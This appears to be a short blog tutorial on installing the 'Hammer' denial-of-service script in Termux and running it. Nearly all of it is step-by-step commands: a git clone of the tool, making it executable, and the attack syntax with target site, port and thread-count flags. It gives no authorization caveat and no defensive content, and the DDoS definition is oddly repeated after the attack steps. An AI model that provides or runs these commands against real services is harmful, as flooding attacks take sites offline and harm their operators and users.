Hammer DDoS ATTACK using Termux Penetration Testing Tool

DDos-Attack

What Is A DDos-Attack

A Distributed Denial of Service (DDoS) attack is an attempt to make an online service unavailable

by overwhelming it with traffic from multiple sources. They target a wide variety of important resources from banks to news websites, and present a major challenge to making sure people can publish and access important information

Steps to Install

  1. Open Termux
  2. pkg update
  3. pkg install python
  4. pkg install python 2
  5. pkg install git
  6. git clone https://github.com/cyweb/hammer.git
  7. Now Hammer Tool Cloning 
  8. Done After Successfully Installed

Open the tool

  • ls
  • cd hammer
  • ls
  • chmod +x hammer.py
  • ls
  • ./hammer.py 
  • Now it shows how to use this tool

How to run Hammer Dos Script
Command syntax

  • ./hammer.py -s ip or site address -p port number -t turbo
  • ./hammer.py -s example.com -p 80 -t 135

  • Now Attack started sending n number of request (packet sending hammering)
  • Bot is hammering 

by overwhelming it with traffic from multiple sources. They target a wide variety of important resources from banks to news websites, and present a major challenge to making sure people can publish and access important information

Post a Comment

0 Comments